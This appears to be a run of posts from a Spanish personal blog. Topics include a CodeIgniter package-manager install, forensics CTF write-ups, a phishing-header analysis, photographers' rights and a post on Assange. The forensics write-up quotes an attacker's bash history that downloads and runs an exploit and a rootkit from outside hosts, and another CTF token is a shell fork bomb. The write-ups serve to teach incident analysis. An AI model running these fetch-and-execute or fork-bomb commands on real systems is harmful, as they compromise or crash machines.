La vieja guardia

Codeigniter es un framework PHP que va creciendo según avanzan sus versiones y va alcanzando unos niveles considerables de madurez. Una de las carencias que tenía hasta ahora es la falta de un gestor de paquetes que permitiera bajarse del repositorio las librerías que fueramos a usar en nuestros proyectos. Algo como tienen otros frameworks de otros llenguajes, como las 'gems' de ruby.

Resulta engorroso hacerlo de forma manual: bajar el zip, integrar config, libraries, helpers, pegar código, etc... Todo esto se puede hacer desde la linea de comandos de la consola. Sparks es el nombre de nuestro gestor de paquetes en Codeigniter. Vamos a verlo paso a paso, desde la instalación a la creación de algún 'Spark' de ejemplo.

1. Instalación de "Sparks", el gestor de paquetes

Partimos de una instalación limpia de Codeigniter para instalar Sparks. Teniendo en cuenta que estamos en /var/www/codeigniter, ejecutamos desde CLI lo siguiente:

php -r "$(curl -fsSL http://getsparks.org/go-sparks)"

Pantallazo 1: Instalacion de Sparks.

Lo que hace la utilidad desde la linea de comandos es preparar codeigniter para Sparks, básicamente haciendo lo siguiente:

• Crea un directorio llamado sparks
• Prepara una clase Loader en  application/core/MY_Loader.php

php tools/spark help

• install # Install a spark
• reinstall # Reinstall a spark
• remove # Remove a spark
• list # List installed sparks
• search # Search for a spark
• sources # Display the spark source URL(s)
• version # Display the installed spark version
• help # This message

Dentro de la competición había una serie de pruebas de análisis forense. Los organizadores te proporcionan un fichero imagen y  debes indicar una serie de datos que te piden, a saber:

feellikecsi_rls: Release name y version del sistema afectado.
feellikecsi_knl: Version del kernel.
feellikecsi_cve: Referencia al documento CVE.
feellikecsi_iph: Dirección IP desde donde se realizó el ataque.
feellikecsi_md5: MD5 del rootkit utilizado.
feellikecsi_ulo: Herramienta utilizada para hacer limpieza de los logs.

Antes de bajar el fichero de imagen kcore.dd, instalo el autopsy y sleuthkit en el sitema para llevar algo de orden y un poco de control sobre lo que vamos averiguando. En definitiva se trata de buscar cadenas dentro de la 'morralla'  que permitan determinar los acontecimientos.

Podríamos haber utilizado comandos desde consola. strings, sed, grep,awk ... pero creo que el interfaz web de autopsy y lo que corre por detrás son bastante potentes ya y hacen uso de todo esto. Dicho esto, pongo las soluciones y algunas comentarios a los retos propuestos a continuación:

Montamos el caso en el autopsy y añadimos la imagen de 1 Gb a nuestro host. Se trata de un fichero swap de memoria donde debemos separar convenientemente la información que nos interese.

Haciendo busquedas en las primeras unidades de información y vemos que la prueba se ha montado en un VMWare, como era de esperar.

Phoenix Technologies LTD
6.00
01/01/1992
VMware, Inc.
VMware Virtual Platform
None
None
Intel Corporation
440BX Desktop Reference Platform

 

Los primeros datos también indican que se trata de un Ubuntu con un determinado kernel:

Linux version 2.6.32-21-generic-pae (buildd@rothera) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 (Ubuntu 2.6.32-21.32-generic-pae 2.6.32.11+drm33.2) %s version %s (buildd@rothera) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) %s

FeellikeCSI: Release Name and Version

Después de identificar nuestro sistema operativo y saber que los datos que nos piden están en /etc/lsb-release, procedemos a lanzar búsquedas contra el volumen. Unas no tienen éxito, pero otras:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

Token: Ubuntu 10.04 LTS

La dificultad también está en saber en que parte del fichero te vas a encontrar la cadena exacta, porque esto es clave para que te acepten el token. De nada sirve que sepas que es un Ubuntu 10.04 si no puedes definirlo al 100%.

FeellikeCSI: Kernel version

Determinar la versión del kernel, creo que fue lo primero que hice y que tenía claro, ya que aparece en demasiadas ocasiones. Como ocurre con la prueba anterior, hay que ser muy preciso a la hora de introducir la respuesta. Fallé varias veces pero al final me aceptó la respuesta.

Token: 2.6.32-21-generic-pae

FeellikeCSI: CVE

El CVE es el documento que detalla y explica una vulnerabilidad / exploit. Son las siglas de Common Vulnerabilities and Exposures. Tiene el formato CVE-AAAA-XXXX donde AAAA es el año de aparición y XXXX un número de correlación.

Así pues empezamos a meternos en harina. ¿Qué hizo el atacante? ¿Cómo se aprovechó?

Empecé a buscar documentos para esta versión del kernel en Google, había unos cuantos candidatos que por las prisas empecé a meter sin éxito, hasta que decidí buscar algo más concreto: wget a ver si había datos interesantes. Tras hacer una pequeña separación y criba de las toneladas de información que había, ví la linea por donde empezaríamos a obtener cosas ya mas jugosas. El autopsy no dejaba irme a dormir y al dia siguiente salía de viaje.

Unit 70867 (Hex - Ascii)
1: 89 (wget)

df -h
free -m
sudo su -
ls
sudo su -
exit
sudo su -
exit
who
uname -a
mkdir .exp
cd .exp
wget http://www.exploit-db.com/download/15285 -O exp.c
vi exp.c
gcc
gcc exp.c -o exp
wget www2.unsec.net/exp
chmod +x exp
./exp
file exp
ldd ./exp
rm exp
wget www2.unsec.net/exp
chmod +x exp
./exp
cd ..
ls
ls -la
exit

Parece que aramosf (www2.unsec.net) se ha estado descargando algún exploit para la prueba :-). Antes ha mirado con df -h y free -m el espacio dsponible y la cantidad de memoria usada y libre. Asi pues, vamos a bajarnos el exploit a ver de que se trata. wget, vim, blablalba.... :

Tenemos una vulnerabilidad en protocolo RDS Linux con CVE-2010-3904.

Token: CVE-2010-3904

FeellikeCSI: IP From the attacker

Aqui debíamos obtener la ip del atacante. Creo que debí buscar todo tipo de variantes para  volcar algún dato satisfactorio. De repente parecía haber encontrado algo en lo que parecían unas variables de entorno:

SHELL=/bin/bashTERM=xtermSSH_CLIENT=46.25.44.195 20929 22SSH_TTY=/dev/pts/0USER=admuserLS_COLORS

... mas datos

/home/admuserSHLVL=2LOGNAME=admuserSSH_CONNECTION=46.25.44.195 20929 178.33.113.35 22LESSOPEN=| /usr/bin/lesspipe %sLESSCLOSE=/usr/bin/lesspipe %s %s_=/usr/include/sslv3/dropbear/usr/include/sslv3/dropbear

Con estos datos estamos a punto de conocer esta prueba y las dos siguientes. Tenemos un path hacia un conocidísimo rootkit que incluye el dropbear y el mig log cleaner.

Token: 46.25.44.195

FeellikeCSI: MD5 of the rootkit

Nos piden el md5 del rootkit con el que han troyanizado el sistema. En la misma búsqueda de wget, me vuelvo a encontrar con algo jugoso:

tar -zxvf rk.tgz
file rk.tgz
wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/rk.tgz -O r
Jun 27 16:38:39 /etc/mysql/deb
[yU~

rk.tgz es el rootkit que procedemos a bajar para ver que contiene y obtener el md5, que creo recordar se aplicaba sobre el tgz. Asi que:

tunelko@desarrollo:/var/www/victima$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/rk.tgz && md5sum rk.tgz
--2011-07-19 14:15:33-- http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/rk.tgz
Resolviendo dl.packetstormsecurity.net... 199.58.210.14
Conectando a dl.packetstormsecurity.net|199.58.210.14|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 4421289 (4,2M) [application/x-gzip]
Guardando en: «rk.tgz»

100%[===============>] 4.421.289 2,14M/s en 2,0s

2011-07-19 14:15:35 (2,14 MB/s) - «rk.tgz» guardado [4421289/4421289]

d0e098de3b0e436f934763810cd31189 rk.tgz

Token: d0e098de3b0e436f934763810cd31189

FeellikeCSI: Log cleaner used

Esta prueba pudo estar un día antes. Debido a la forma de encontrar los datos que ya comenté antes, me equivoqué y ya dudaba estar en los cierto sobre si los logs habían sido limpiados con el mig, como era previsible pensar.

Sabía que junto a dropbear estaba el mig y esa fue la cadena de búsqueda que emplee, hasta llegar a :

[0;32m******************************
[0;32m* MIG Logcleaner v2.0 by
[0;31mno1
[0;32m*
[0;32m******************************

..

Intenté de todo: "MIG", "MIG Logcleaner", "MIG Logcleaner v2.0". Nada. ¿Quién iba a pensar que el nombre del 'log cleaner' incluiría el nombre del autor?

Perdí mucho tiempo, pero al final ... estaba ahí !

Token: MIG Logcleaner v2.0 by no1

Ya para acabar, decir que este es un documento elaborado para tratar de narrar mi propia experiencia, sin ningua otra intención ni motivación.

Un saludo a todos y hasta la próxima !

En el reto se nos muestra una imagen donde hay una calavera pirata que nos sugiere que puede haber algún error en la imagen.

Después de pasar por varias herramientas de extracción de metadatos exif y conocer todo tipo de detalles sobre la creación de la imagen hago una búsqueda de error level analysis en google y me encuentro con un articulo muy interesante de BlakcHat 2007: "A Picture's Worth...  Digital Image Analysis and Forensics - Neal Krawetz, Ph.D."

Decido por pasar una herramienta para ver si puede haber algo en ella.

http://errorlevelanalysis.com/permalink/46f278b/

Parece que sí. :-)

Token: :(){:|:&};:

En primer lugar gracias a las personas detrás de SbD por organizar este concurso y enhorabuena a los ganadores, esperamos sus write-ups ansiosos.

Este reto consistía en conocer el token al ejecutar el fichero que proporcionaba la prueba 'keyconsole'. Al ejecutarlo mostraba el siguiente mensaje:

Decido abrir el binario con un editor hexadecimal y veo que antes de 'Checking if ...' hay un path hacia un fichero que puede ser la resolución de la prueba: /tmp/%i_privatekey_%i con un /dev/random encargado de generar numeros aleatorios. El %i es un entero

De hecho, si ejecutamos  strace ./tmp_key podemos ver que intenta abrir un fichero distinto generado con un número aleatorio al principio y al final: /tmp/0_privatekey_2

Lo ejecutamos varias veces para comprobarlo y es así, cada vez pide un fichero con el inicio y final siempre generado 'aleatoriamente'  %i%i%i%i%i

Para generar tantas combinaciones posibles de ficheros me hago un shell script que genere todos esos ficheros para ver que pasa, el script es muy sencillo, tonto y mejorable:

LIMIT=4 k=0 for ((i=0; i<=LIMIT; i++)); do `touch /tmp/$i'_privatekey_'$i` ; for ((k=0; k<=LIMIT; k++)); do `touch /tmp/$k'_privatekey_'$i` ; done done

Finalmente lo ejecutamos y voilá!

Token: Your*environment_is-fully:compatible_you*can=play.NOW

Intentaré subir más retos en los próximos días, superé sólo ocho más.

Hasta la próxima.!

He recibido en la carpeta spam (gracias gmail, por si acaso) un mensaje con el asunto "You have notifications pending" procedente presuntamente de twitter. Me ha resultado gracioso el intento de engaño, pero he querido mirar aún así las cabeceras del mensaje. Siempre es bueno echarle un vistazo cuando tienes dudas, aunque en este caso las dudas no existieran porque claramente se trataba de un mensaje maligno.

Vamos a analizar estas cabeceras. Primero, ¿Cómo las veo?

Tratándose de gmail por web, vamos a ver que en la parte derecha del mensaje hay un 'Responder' visible con un icono de flecha para abajo, desplegamos y hacemos click en Mostrar original:

Nos sacará una pestañita nueva o ventana, con la información ampliada de las cabeceras. Recordemos que el mensaje decia venir directamente de twitter. Esto es ... falso.

Delivered-To: miusuarioxyz@gmail.com
Received: by 10.216.61.130 with SMTP id w2cs476wec;
Sun, 20 Mar 2011 21:03:12 -0700 (PDT)
Received: by 10.42.238.140 with SMTP id ks12mr756826icb.414.1300680191271;
Sun, 20 Mar 2011 21:03:11 -0700 (PDT)
Return-Path: <bin@anditek.com>
Received: from hm2663.locaweb.com.br (hm2663.locaweb.com.br [187.45.193.174])
by mx.google.com with SMTP id hj39si13359961ibb.61.2011.03.20.21.03.09;
Sun, 20 Mar 2011 21:03:11 -0700 (PDT)
Received-SPF: neutral (google.com: 187.45.193.174 is neither permitted nor denied by best guess record for domain of bin@anditek.com) client-ip=187.45.193.174;
Authentication-Results: mx.google.com; spf=neutral (google.com: 187.45.193.174 is neither permitted nor denied by best guess record for domain of bin@anditek.com) smtp.mail=bin@anditek.com
Received: by mx005.twitter.com (Postfix, from userid 1064665268)
id 010D4006B4A; Mon, 21 Mar 2011 01:03:10 +0000 (UTC)
Content-Type: multipart/alternative;
boundary="----------=_1064665268-39975-6239465"
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.427 (Entity 5.427)
From: "Twitter" <twitter-notify-misuuarioxyz=gmail.com@postmaster.twitter.com>
Subject: You have notifications pending
To: misuuarioxyz@gmail.com
Message-Id: <20110321100103.010D4006B4A@mx005.twitter.com>
Date: Mon, 21 Mar 2011 01:03:10 +0000 (UTC)

Lo relevante de las cabeceras lo he marcado en rojo para que la posterior explicación. Al parecer el mensaje dirigido a mi correo viene realmente de la maquina hm2663.locaweb.com.br según lo recibe google.

Algo que me llama la atención y que puede dar algún indicio de que ésta maquina puede estar comprometida es que por web muestra este bonito Internal Server Error. El UID del fichero index.php es mas pequeño que el min_uid. Ummm vaya y sólo nos enseña que es  suPHP 0.6.3.

Algo interesante, aunque nada concluyente, pero vamos al lío que me despisto. Podemos sacar las siguientes conclusiones:

1. Que el origen del mensaje es la maquina de brasil (hm2663.locaweb.com.br [187.45.193.174]) del remitente bin@anditek.com.

2. Que la dirección ha sido spoofeada pretendiéndonos hacer creer que los mensajes vienen legítimamente del postmaster de twitter.

3. Que twitter es un sitio usado frecuentemente por los del spam para sus propósitos, como cualquier otro sitio que esté siendo usado de forma masiva.

Gracias al blog 'apunta y dispara', me hago eco de ciertas condiciones laborales que sufren los trabajadores fotoperiodistas, periodistas gráficos o meros aficionados que, cuando llevan una cámara al hombro, son sospechosos de cualquier cosa.

Ojalá tuviéramos los derechos que, en un mundo ideal, deberíamos tener.

Acuerdo oficial publicado en el NY Times Desde el 10 de julio 2010:

1. Usted puede hacer una fotografía de cualquier cosa y de cualquier persona en cualquier propiedad pública, excepto cuando una ley específica lo prohíba. es decir, calles, aceras, plazas, parques, edificios de gobierno abierto al público, y las bibliotecas públicas.

2. Usted puede disparar en la propiedad privada si está abierto al público, pero usted está obligado a parar si el propietario se lo solicita. Es decir, centros comerciales, tiendas, restaurantes, bancos, y los vestíbulos de edificios de oficinas.

3. Los propietarios privados de propiedad puede evitar la fotografía de su propiedad, pero no la fotografía de sus bienes desde un lugar público.(Esta se entiende mal, pero vamos, que si se puede desde fuera y no desde dentro. O algo asi.)

4. Cualquiera puede ser fotografiado sin consentimiento cuando están en un lugar público a menos que haya una expectativa razonable de privacidad. Es decir, viviendas particulares, baños, vestuarios, instalaciones médicas, y las cabinas de teléfono.

5. A pesar de conceptos erróneos, los siguientes temas son casi siempre permitido:

* accidentes, las escenas de incendios, los niños * actividades penales, las celebridades, la ley de los agentes del orden * puentes, infraestructura, medios de transporte * residenciales, comerciales y edificios industriales.

6. La seguridad es raramente una razón aceptable para restringir fotografía. Sacar una foto de un lugar público no puede infringir los secretos comerciales, ni es la actividad terrorista.

7. Los particulares no pueden detenerlo en contra de su voluntad a menos que un delito grave se haya cometido en su presencia. Los que lo hagan pueden estar sujetos a cargos criminales y civiles.

8. Es un delito que alguien le amenace con causarle daño, la detención, confiscación o el arresto porque usted está haciendo fotografías.

9. Usted no está obligado a proporcionar su identidad o razón para fotografiar salvo que sea interrogado por un agente del orden y la ley estatal lo requiera.

10. Los particulares no tienen derecho a confiscar su equipo sin una orden judicial. Incluso los agentes del orden deben obtener una menos que hacer un arresto. Nadie te puede obligar a eliminar las fotos que ha hecho.

Cuando se encuentre, amenazado con la detención o el decomiso de equipos, haga las siguientes preguntas:

* ¿Cuál es su nombre?

* ¿Cuál es el nombre de su empleador?

* ¿Puedo salir? Si no, ¿cuál es el fundamento jurídico de mi detención?

* Si el equipo es confiscado, ¿cuál es la base legal para la confiscación?

Gracias, Antonio Espejo, por la información.

No recuerdo si fué exactamente a través del blog "Apunta y Dispara" que me enteré del concurso que Sony estaba organizando en Flickr. El concurso estaba dividido en varias temáticas en las que se podía participar, a saber: gente, deportes, naturaleza y viajes, no en ese orden. Me apunté a la categoría "People" con una fotografía que había realizado recientemente con un tele 80-200 montado en la Canon 400D. Estos objetivos son un poco especiales si no estás acostumbrado a manejarlos (como era el caso) porqué "aplastan" el primer plano contra el fondo y lo "igualan". Son los típicos que se emplean en los aburridos reportajes de telediario para proporcionar cifras de encuestas mientras ponen un plano fijo de gente caminando por una avenida abarrotada. Esos. Caminaba cerca del teatro Campoamor (Oviedo, Asturias) y me fijé desde una farola cercana en la escena. Hice cuarto o cinco disparos y me fuí. Hacía unos dias que había comentado con alguien: "Estoy cerca de la foto que quiero hacer".

Lo curioso es que antes de hacer esta fotografía había comprado el objetivo en una tienda de estas de compraventa de segundamano y decidí darme una vuelta para probarlo.

Vaya sorpresa cuando me comunican que había quedado en tercera posición de entre mas de un millar de fotografías. Es un honor poder participar y que te premien, cada día me gusta más la fotografía premiada, que es esta:

Gracias, especialmente a los organizadores.

Viene a la actualidad la persona de Julian Assange. Me he preguntado en estos dias acerca su personalidad y he llegado, quizá, en ésta trampa está mi error, si el personaje se pudiera parecer a Morfeo, nombre del protagonista de la película Matrix. ¿Cómo una persona puede poner en jaque a un imperio como Estados Unidos?

Al pie de estas lineas establezco improvisadas pestañas en el navegador para conocer a Julian, después de todo lo que hemos podido leer en estos dias sobre la persona y sus actos. Accedo a la wikipedia y leo su perfil. Me pregunto porqué parece que hace dos días que se ha editado, en su versión castellana. La versión anglosajona, es un poco diferente y no habla lo siguiente que me llamó la atención y que cuento bajo estas líneas: Nmap.

Destaca para mi desconocimiento que Julian es un activista del software libre, hacker y precursor de uno de los programas 'imprescindibles' para cualquier hacker: Nmap. Hasta donde yo sé Nmap es un desarrollo de Gordon Lyon (Fyodor en nmap.org) si bien es cierto que ha tenido numerosas contribuciones hasta llegar a ser lo que es hoy en dia. Por ejemplo, QueSO, programa escrito por Jordi Murgó (netSavage) para detecar sistemas operativos detras de un host. En la entrada de la wikipedia se dice que el programa que ha escrito Julian Assange llamado Strobe es el precedente al Nmap, algo que bajo mi punto de vista es inexacto.

La pregunta que planteo en esta entrada está generada principalmente por mi ignorancia e inquietud. Desconfío a menudo en el mensaje superficial que se nos presenta impuesto. Con Wikileaks está pasando algo parecido a Matrix. Que todo lo que nos rodea tiene cierto presunto tufillo a mentira. Lo que nos dicen los gobiernos, como se relacionan entre ellos, que objetivos nos plantean de cara a la galeria y cuales son sus verdaderos métodos para conseguir sus verdaderos objetivos. Me conmueve como los medios que no son los 'elegidos' por Julian minimizan la importancia de su mensjae y a su vez establezco cierta contradicción en su personaje. ¿Es una 'metamanipulación' la información que se ofrece a cuentagotas por wikileaks o por el contrario estamos delante de la mayor revelación informativa de nuestra historia?

'Under attack'

El otro día en elpais.com se hablaba de una conversación entre Julian y Joseba Elola donde decía que estaba intentando minimizar los ataques que está sufriendo éstos dias. Debe estar enfrentándose él y su 'equipo' a cantidades ingentes de 'mala hostia' 'enfado 2.0' para garantizar el acceso a todos los documentos. Se ha abierto el debate de la neutralidad en la red precisamente por que se teme que la red pierda su filosofía inicial con la excusa de la seguridad, una vez más. Ahora la patata caliente se llama Wikileaks. Amazon se niega, alegando política de empresa, a continuar alojándoles, seguramente por presiones del gobierno norteamericano.Tampoco everydns.net, registrador del dominio, parece que quiera seguir ofreciéndoles servicio. Tim Bernes-Lee creador de la WWW recientemente propuso un modelo de web distribuida p2p para evitar que la información se concentre en un único punto y evitar de paso los ataques DDOS (sufridos por wikileaks como podeis imaginar). Parece una idea muy interesante para garantizar que los ciudadanos tengamos acceso permanente a un recurso interesante que de forma interesada se pretende cerrar por los mismos gobiernos que llevan el estilo de la doble moral en su vida diaria, ¿Verdad señora De La Vega?.

Como comenta Raúl Rivero en su artículo de elpais el único punto donde nos quitarían la libertad (y derecho) de acceso a la información sería que el ICANN cortara el acceso al dominio. ¿Se atraverán?

Fuga de datos

¿ Cómo, por conciencia quizá, se obitiene de los individuos filtraciones tales como para poner en la palestra a gobiernos tan poderosos?.¿Es Morfeo Julian Assenge? o quizá, estamos todos manipulados  al antojo de unos cuantos. Mi desconcierto se amplia a medida que pasan los dias. Que curiosa concidencia en el tiempo que vivimos. Antes del 'cablegate' ya había visto vídeos filtrados en Abril de 2010. ¿Qué será lo siguiente y a quién implicará? ¿Cómo lo asimilaremos los ciudadanos?  Demasaidas preguntas sin respuesta. Nos toca elegir entre la pastilla azul o la roja.

Continuará ...

Con noticias sobre este asunto que me parece que todavía no asimilamos de todo.